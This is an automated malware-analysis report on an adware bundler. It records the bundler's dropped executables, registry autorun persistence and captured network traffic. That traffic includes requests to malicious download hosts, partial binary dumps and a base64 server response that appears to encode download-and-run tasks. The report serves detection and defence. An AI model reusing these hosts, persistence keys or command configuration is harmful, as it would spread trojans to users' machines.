Application.Bundler.Temonde.NN_52a0648569

Application.Bundler.Temonde.NN (BitDefender), SoftwareBundler:MSIL/Wizrem (Microsoft), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.MulDrop7.35368 (DrWeb), Applicatio...
Blog rating:2 out of5 with1 ratings

Application.Bundler.Temonde.NN_52a0648569

by malwarelabrobot on August 29th, 2017 in Malware Descriptions.

Application.Bundler.Temonde.NN (BitDefender), SoftwareBundler:MSIL/Wizrem (Microsoft), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.MulDrop7.35368 (DrWeb), Application.Bundler.Temonde.NN (B) (Emsisoft), Packed-NV!52A06485699D (McAfee), Trojan.Gen.2 (Symantec), Trojan.MSIL.Crypt (Ikarus), Win32:Malware-gen (AVG), Win32:Malware-gen (Avast), TROJ_MONETIZE.SM (TrendMicro), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Packed, Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 52a06485699d591efc2e142444c36154
SHA1: c2f159956ecf5dd3652f812e91132e632c9165f1
SHA256: 1d93979c8ef5527676db3ea3636930abab1427fadba4aeeaa35e8518e1172306
SSDeep: 1536:/cQPbdKKQUuSC6ROWhXYqRoDx3JngJIYDrPjQF:/cQMK1PsobMdiIErP8F
Size: 53248 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-08-03 09:50:06
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Application creates the following process(es):

SecondL.exe:2700
Sho9libi.exe:1772
OneTwo.exe:2916
%original file name%.exe:1924

The Application injects its code into the following process(es):

52p1njv1z5v.exe:3708
%original file name%.exe:1908
VIKAUDDVJ.exe:3816

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process SecondL.exe:2700 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\g1mavwlqh0w\52p1njv1z5v.exe (204 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\g1mavwlqh0w\52p1njv1z5v.exe.config (1 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (856 bytes)

The Application deletes the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2700.428737 (0 bytes)

The process Sho9libi.exe:1772 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (860 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (860 bytes)

The process OneTwo.exe:2916 makes changes in the file system.
The Application creates and/or writes to the following file(s):

%Program Files%\VIKAUDDVJG\uninstaller.exe.config (1 bytes)
%Program Files%\VIKAUDDVJG\VIKAUDDVJ.exe.config (1 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (852 bytes)
%Program Files%\VIKAUDDVJG\VIKAUDDVJ.exe (91046 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (852 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (852 bytes)
%Program Files%\VIKAUDDVJG\uninstaller.exe (44251 bytes)

The Application deletes the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2916.429283 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2916.429283 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2916.429283 (0 bytes)

The process %original file name%.exe:1908 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\NAZ7U0Z6EK\SecondL.exe (208 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\NAZ7U0Z6EK\OneTwo.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\NAZ7U0Z6EK\SecondL.exe.config (1 bytes)
C:\config.conf (47 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\NAZ7U0Z6EK\Sho9libi.exe (227194 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\NAZ7U0Z6EK\Sho9libi.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\NAZ7U0Z6EK\OneTwo.exe (12941 bytes)

The process VIKAUDDVJ.exe:3816 makes changes in the file system.
The Application creates and/or writes to the following file(s):

%Program Files%\VIKAUDDVJG\cast.config (37 bytes)

Registry activity

The process SecondL.exe:2700 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"EnableFileTracing" = "0"

The Application deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process 52p1njv1z5v.exe:3708 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"processname" = "iexplore.exe"
"WindowClassName" = "DDEMLMom"

To automatically run itself each time Windows is booted, the Application adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"drg0zk23g1j" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\g1mavwlqh0w\52p1njv1z5v.exe"

The process Sho9libi.exe:1772 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASMANCS]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

The process OneTwo.exe:2916 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASMANCS]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASMANCS]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"EnableFileTracing" = "0"

The Application deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process %original file name%.exe:1924 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Application deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process %original file name%.exe:1908 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\52a06485699d591efc2e142444c36154_RASAPI32]
"FileTracingMask" = "4294901760"
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\52a06485699d591efc2e142444c36154_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\52a06485699d591efc2e142444c36154_RASMANCS]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\52a06485699d591efc2e142444c36154_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\52a06485699d591efc2e142444c36154_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\52a06485699d591efc2e142444c36154_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\52a06485699d591efc2e142444c36154_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\52a06485699d591efc2e142444c36154_RASMANCS]
"MaxFileSize" = "1048576"

To automatically run itself each time Windows is booted, the Application adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_GN80Z" = "C:\%original file name%.exe"

The Application deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process VIKAUDDVJ.exe:3816 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\VIKAUDDVJ_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\VIKAUDDVJ_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\VIKAUDDVJ_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\VIKAUDDVJ_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\VIKAUDDVJ_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\VIKAUDDVJ_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\VIKAUDDVJ_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\VIKAUDDVJ_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\VIKAUDDVJ_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\VIKAUDDVJ_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\VIKAUDDVJ_RASMANCS]
"FileDirectory" = "%windir%\tracing"

To automatically run itself each time Windows is booted, the Application adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Y8LH5W7H9S9CA9N" = "%Program Files%\VIKAUDDVJG\VIKAUDDVJ.exe"

Dropped PE files

MD5 File path
0c64e1bb0a9e858adb364f0f5f81e026 c:\Program Files\VIKAUDDVJG\VIKAUDDVJ.exe
866b3dbc4722e039d2ada421d6734c81 c:\Program Files\VIKAUDDVJG\uninstaller.exe
195fce89932990ab844021c43d01fb8c c:\Users\"%CurrentUserName%"\AppData\Local\Temp\NAZ7U0Z6EK\OneTwo.exe
3164f6f1e1bf642a17038ec9ead0211b c:\Users\"%CurrentUserName%"\AppData\Local\Temp\NAZ7U0Z6EK\SecondL.exe
babda8b6e42c1524f05e41fe4ef4639b c:\Users\"%CurrentUserName%"\AppData\Local\Temp\NAZ7U0Z6EK\Sho9libi.exe
34817ecb1377edb1df38a90a885f8c5d c:\Users\"%CurrentUserName%"\AppData\Roaming\g1mavwlqh0w\52p1njv1z5v.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: 46VN
Product Name: 46VN
Product Version: 5.2.0.2
Legal Copyright: Copyright (c) 2847
Legal Trademarks:
Original Filename: JAY789007Z66Z.exe
Internal Name: JAY789007Z66Z.exe
File Version: 5.2.0.2
File Description: 46VNOFUU
Comments: 46VNOFUU
Language: German (Germany)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 8192 47380 47616 4.3033 c232c66c7538c5a084162dec9e6e8212
.rsrc 57344 4484 4608 3.52305 bc36757707b308a40650bca3f231c408
.reloc 65536 12 512 0.056519 f7ba17573fc40bd6cefdd0bd02b3390e

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1
75ed39b498b600f04c0f76ce2fdc492b

URLs

URL IP
hxxp://www.wizzmonetize.com/remotes_xml_sections.php 188.165.209.131
hxxp://bratitlamio.com/from_backup/747474/AdsShow_installer.exe 46.105.121.115
hxxp://bratitlamio.com/3/000000/wizzcaster_installer_v2.exe 46.105.121.115
hxxp://bratitlamio.com/exe/updater.exe 46.105.121.115
hxxp://bratitlamio.com/safe_download/582369/AdsShow.exe 46.105.121.115
hxxp://www.wizzmonetize.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load 188.165.209.131
hxxp://bratitlamio.com/download/3/wizzcaster_v2.exe 46.105.121.115
hxxp://www.wizzmonetize.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok 188.165.209.131
hxxp://bratitlamio.com/download/3/wizzcaster_uninstaller_v2.exe 46.105.121.115
hxxp://www.wizzmonetize.com/api/v5/config 188.165.209.131
hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load 188.165.209.131
hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok 188.165.209.131
hxxp://ladomainadeserver.com/api/v5/config 176.31.107.87


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

GET /download/3/wizzcaster_v2.exe HTTP/1.1
Host: bratitlamio.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 28 Aug 2017 10:22:17 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_v2.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
128200..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L......Y.........."...0.................. ........@.. ................
....................@.................................x...O...........
........................@.............................................
... ............... ..H............text........ ......................
 ..`.rsrc...............................@..@.reloc....................
..........@..B........................H.......x".............. 2.. ...
........................................&..(.....*...0..@.........(...
...~....o......s......o......o......o....................*........45..
.....0............s................*................~r...p.....rC..p..
...r]..p.....*&.(......*...0..9........~.........,".r...p.....(....o..
..s............~..... ..*....0...........~..... ..*".......*.0........
...~..... ..*".( ....*Vs....(!...t.........*...0............(....("...
.~....("....~....("....(......o#.........io$.....(%.....o&.......("...
....('.......o(...r...po)......o*...t"..............%...o ...&........
.*..................".(.....*...BSJB............v2.0.50727......l.....
..#~..,...d...#Strings............#US.l.......#GUID...|...,...#Blob...
........WU.........3........ ................... .....................
..................................~.5.....5................./...a./...
B./...../...../...../...../.........:......./... .....&....._.E.......
........<./.........o.....A...........H.....y.......5.....U...V
<<< skipped >>>

GET /download/3/wizzcaster_uninstaller_v2.exe HTTP/1.1


Host: bratitlamio.com


HTTP/1.1 200 OK
Date: Mon, 28 Aug 2017 10:22:18 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_uninstaller_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
77c00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
......Y.........."...0.................. ........@.. .................
...................@.................................X...O............
....................... ..............................................
.. ............... ..H............text........ ...................... 
..`.rsrc...............................@..@.reloc...............z.....
.........@..B........................H.......x".............. 2.......
.......................................&..(.....*...0..@.........(....
..~....o......s......o......o......o....................*........45...
....0............s................*................~r...p.....rC..p...
..r]..p.....*&.(......*...0..9........~.........,".r...p.....(....o...
.s............~..... ..*....0...........~..... ..*".......*.0.........
..~..... ..*".( ....*Vs....(!...t.........*...0............(....("....
~....("....~....("....(......o#.........io$.....(%.....o&.......("....
...('.......o(...r...po)......o*...t"..............%...o ...&.........
*..................".(.....*...BSJB............v2.0.50727......l......
.#~..,...d...#Strings............#US.l.......#GUID...|...,...#Blob....
.......WU.........3........ ................... ......................
.................................~.5.....5................./...a./...B
./...../...../...../...../.........:......./... .....&....._.E........
.......<./.........o.....A...........H.....y.......5.....U...V.
<<< skipped >>>


GET /safe_download/582369/AdsShow.exe HTTP/1.1
Host: bratitlamio.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 28 Aug 2017 10:22:17 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
2000..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
.....Y.........."...0.............N2... ...@....@.. ..................
..................@..................................1..O....@..D.....
...............`.......0..............................................
. ............... ..H............text...T.... ...................... .
.`.rsrc...D....@......................@..@.reloc.......`..............
........@..B................02......H.......("...............0........
.......................................0............s............,N.~.
...r...p.o......(....r]..pra..po....rc..p(....o....rc..p(....o......o.
..... Z.rg..p(.............,...........,.. `......o....Z(......rq..p(.
...&. `.......o....Z(......... .&....*...................0..4........r
...p..rg..p( .....,...r...p(!...("........ ... ..*".(#....*&.(#.....*.
.0..9........~.........,".r...p.....($...o%...s&...........~..... ..*.
...0...........~..... ..*".......*.0...........~..... ..*".('....*Vs..
..((...t.........*..BSJB............v2.0.50727......l...$...#~......x.
..#Strings........D...#US.L.......#GUID...\.......#Blob...........W...
.......3........$...................(.................................
..............X.Z.....Z.....(...............;.................x.......
............;...J.;..........._....._...f._...6......._...X.....o.(...
/.Z.....z...........A.....A.........`.....1.....*._...W.....1.......(.
...._...s._.........................W.E.=...........E.=...........
<<< skipped >>>


POST /api/v5/config HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: ladomainadeserver.com
Content-Length: 38
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




uid=57a764d042bf8&days_after_install=0

HTTP/1.1 200 OK


Date: Mon, 28 Aug 2017 10:22:19 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=3d197eebbd5cdc7044ebb0a073b1e168600e80e3; expires=Mon, 28-Aug-2017 12:22:19 GMT; Max-Age=7200; path=/; httponly
Content-Length: 28
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"time_between_prints":"15"}HTTP/1.1 200 OK..Date: Mon, 28 Aug 2017 10
:22:19 GMT..Server: Apache/2.4.10 (Debian)..Cache-Control: no-cache..S
et-Cookie: laravel_session=3d197eebbd5cdc7044ebb0a073b1e168600e80e3; e
xpires=Mon, 28-Aug-2017 12:22:19 GMT; Max-Age=7200; path=/; httponly..
Content-Length: 28..Keep-Alive: timeout=10, max=100..Connection: Keep-
Alive..Content-Type: text/html; charset=UTF-8..{"time_between_prints":
"15"}..



GET /from_backup/747474/AdsShow_installer.exe HTTP/1.1
Host: bratitlamio.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 28 Aug 2017 10:22:13 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow_installer.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
2a00..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
.....Y.........."...0.............B=... ...@....@.. ..................
..................@..................................<..O....@..L..
..................`.......;...........................................
.... ............... ..H............text...H.... .....................
. ..`.rsrc...L....@....... ..............@..@.reloc.......`.......(...
...........@..B................$=......H........#..8............;.....
..........................................0..%.............(....(....r
...pr...po....(......(....&.(....r...pr...po....r...p(....(........ T.
.... ..........,........ #.....3..... ......,......X......X.... X.....
....-.....X.... ..........-.... ...... ..........,.........X.... .....
.....-..(.....(...........%.r...p.%.ra..p.%.r...p.%.r...p.%.rG..p.%.r[
..p.%.rB..p.%.rR..p.%.r...p.%..r...p.%..rQ..p.%..r...p.%..r...p.%..r:.
.p.%..r...p.%..r...p.%..r...p.%..r9..p.%..rQ..p.%..r...p.%..r...p.%..r
...p.%..r...p.%..r...p.%..r...p.%..r...p.(.......r...p(......(........
......,.....(....& ..r...p(....&.........*...A........................
....0..f........r...p.r!..p... ".. ..........,...r/..p(.........X.. ..
........-.s.......rG..p(....s.....o.....r...p.*".( ....*&.( .....*....
0..9........~.........,".r...p.....(!...o"...s#...........~..... ..*..
..0...........~..... ..*".......*.0...........~..... ..*".($....*Vs...
.(%...t.........*..BSJB............v2.0.50727......l...$...#~.....
<<< skipped >>>

GET /3/000000/wizzcaster_installer_v2.exe HTTP/1.1


Host: bratitlamio.com


HTTP/1.1 200 OK
Date: Mon, 28 Aug 2017 10:22:13 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_installer_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
33200..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
......Y.........."...0..z............... ........@.. .................
...................@.....................................O............
................`......x..............................................
.. ............... ..H............text....x... ...z.................. 
..`.rsrc................|..............@..@.reloc.......`.......0.....
.........@..B........................H.......x".............. 2..Xd...
.......................................&..(.....*...0..@.........(....
..~....o......s......o......o......o....................*........45...
....0............s................*................~r...p.....rC..p...
..r]..p.....*&.(......*...0..9........~.........,".r...p.....(....o...
.s............~..... ..*....0...........~..... ..*".......*.0.........
..~..... ..*".( ....*Vs....(!...t.........*...0............(....("....
~....("....~....("....(......o#.........io$.....(%.....o&.......("....
...('.......o(...r...po)......o*...t"..............%...o ...&.........
*..................".(.....*...BSJB............v2.0.50727......l......
.#~..,...d...#Strings............#US.l.......#GUID...|...,...#Blob....
.......WU.........3........ ................... ......................
.................................~.5.....5................./...a./...B
./...../...../...../...../.........:......./... .....&....._.E........
.......<./.........o.....A...........H.....y.......5.....U...V.
<<< skipped >>>

GET /exe/updater.exe HTTP/1.1


Host: bratitlamio.com


HTTP/1.1 200 OK
Date: Mon, 28 Aug 2017 10:22:14 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="updater.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
23bc00..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L......Y.........."...0...!.........."!.. ...@!...@.. ................
....... $...........@.................................X"!.O....@!.....
..................$..... !!...........................................
... ............... ..H............text.....!.. ....!.................
 ..`.rsrc........@!.......!.............@..@.reloc........$.......#...
..........@..B................."!.....H.......x".............. 2.... .
........................................&..(.....*...0..@.........(...
...~....o......s......o......o......o....................*........45..
.....0............s................*................~r...p.....rC..p..
...r]..p.....*&.(......*...0..9........~.........,".r...p.....(....o..
..s............~..... ..*....0...........~..... ..*".......*.0........
...~..... ..*".( ....*Vs....(!...t.........*...0............(....("...
.~....("....~....("....(......o#.........io$.....(%.....o&.......("...
....('.......o(...r...po)......o*...t"..............%...o ...&........
.*..................".(.....*...BSJB............v2.0.50727......l.....
..#~..,...d...#Strings............#US.l.......#GUID...|...,...#Blob...
........WU.........3........ ................... .....................
..................................~.5.....5................./...a./...
B./...../...../...../...../.........:......./... .....&....._.E.......
........<./.........o.....A...........H.....y.......5.....U...V
<<< skipped >>>


POST /remotes_xml_sections.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.wizzmonetize.com
Content-Length: 169
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




remote_id=1&user_name=wemonetize&api_key=e721cfcc-2148-11e6-922f-0cc47
a47968c&buying_product_name=DefaultProduct&buying_partner_name=Default
Partner&buying_channel_name=1

HTTP/1.1 200 OK


Date: Mon, 28 Aug 2017 10:22:10 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=21ov4vepkn4dr7qrnm2h3l1673; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1608
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
PHVwZGF0ZXMgcmVmcmVzaD0iMTIwIj4KCjx0YXNrPg0KDQo8cGVyZm9ybT4NCg0KPGRvd2
5sb2FkIG5hbWU9IlNlY29uZEwiIHZhbHVlPSJodHRwOi8vYnJhdGl0bGFtaW8uY29tL2Zy
b21fYmFja3VwLzc0NzQ3NC9BZHNTaG93X2luc3RhbGxlci5leGUiIHZlcnNpb249IiIgIH
NvZnR3YXJlPSIiIG5ldD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG5hbWU9
IlNlY29uZEwiIHZhbHVlPSJub3R3YWl0IiBwYXJhbXM9Im5pbXBvcnRlIi8 DQo8bW9kIH
R5cGU9ImFkZCIgbmFtZT0iUXNPbmUiIHZhbHVlPSIxNzA4MjgiLz4NCg0KPC9wZXJmb3Jt
Pg0KDQo8Y29uZGl0aW9ucz4NCg0KPG1vZCB0eXBlPSJjaGVjayIgbmFtZT0iUXNPbmUiIH
ZhbHVlPSI0NTE3MDgyOCIgbWF0Y2g9ImZhbHNlIi8 DQoNCjwvY29uZGl0aW9ucz4NCjwv
dGFzaz48dGFzaz4NCg0KPHBlcmZvcm0 DQoNCjxkb3dubG9hZCBuYW1lPSJPbmVUd28iIH
ZhbHVlPSJodHRwOi8vYnJhdGl0bGFtaW8uY29tLzMvMDAwMDAwL3dpenpjYXN0ZXJfaW5z
dGFsbGVyX3YyLmV4ZSIgdmVyc2lvbj0iIiAgc29mdHdhcmU9IiIgbmV0PSJ5ZXMiIC8 DQ
